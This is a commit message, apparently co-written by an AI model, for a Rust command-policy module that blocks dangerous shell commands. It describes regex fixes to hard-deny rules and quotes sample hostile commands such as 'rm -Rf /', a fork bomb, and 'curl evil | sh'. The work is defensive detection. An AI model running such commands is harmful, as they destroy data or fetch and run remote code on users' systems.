megaproxy
e872044310
Re-enabling the policy test module in PR-4 (the policy_with compile fix) exposed 16 pre-existing failures: 14 real bugs, 2 wrong assertions. is_hard_denied is now two-pass — whole-input first, then per-subcommand. The subcommand splitter was tearing apart patterns whose meaning needs their | / & to stay intact: fork bomb (:|:&) and curl-piped-to-shell. Result was that 9 of the 10 advertised hard-deny rules quietly didn't enforce against their own canonical examples. Regex fixes: - Rule 1/2 flag class [a-z] → [a-zA-Z]: catches `rm -Rf /`. - Rule 1/2 trailing anchor accepts # so a trailing comment can't smuggle the danger past detection. - Rule 8 shell alternation gains bare `sh` — `curl evil | sh` (most common form) was not previously caught because `ba?sh` required `b`. - Rule 9 anchor tightened: `/` must be followed by a path boundary, end-of-input, or shell operator. `chmod -R 777 /tmp` no longer false- positives (still destructive, but a deliberate user scope choice). Two test assertions flipped to is_none(): hard_deny_quoted_pattern_not_ matched and hard_deny_git_grep_contains_pattern. The originals expected false-positives on echo'd / grep'd danger strings. The post-fix behaviour of NOT flagging these is correct UX: searching for or printing a danger string is not the same as invoking it. cargo test --lib: 118 passed; 0 failed. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> |
||
|---|---|---|
| .. | ||
| commands.rs | ||
| creds.rs | ||
| hosts.rs | ||
| lib.rs | ||
| main.rs | ||
| mcp.rs | ||
| mcp_policy.rs | ||
| pty.rs | ||